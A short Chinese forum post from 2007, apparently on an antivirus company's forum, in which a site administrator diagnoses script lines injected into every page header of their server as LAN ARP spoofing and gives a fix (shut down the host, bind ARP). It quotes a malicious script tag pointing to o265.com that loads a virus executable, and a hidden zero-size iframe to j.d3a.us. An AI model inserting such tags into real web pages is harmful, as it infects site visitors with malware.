cexts2008 - 2007-3-9 11:46:00
服务器上的网站所有的页面头部都会有这样的一句代码,并且是有时候有,有时候没有,刷新几次就有了,再刷新就没有
<script src=http://o265.com/1.js></script>
经过解析这个代码片段发现:这个JS又调用了http://www.z968.net/temp.exe这个病毒,而这两个站的IP是同样的。
网上也见过另一个受害者被插入了这个代码:<iframe src=http://j.d3a.us/ width=0 height=0 frameborder=0></iframe>
检查了页面,里面是没有这句代码的。
结论:局域网内的ARP欺骗。办法是关掉那台主机,同时做ARP绑定。
© 2000 - 2026 Rising Corp. Ltd.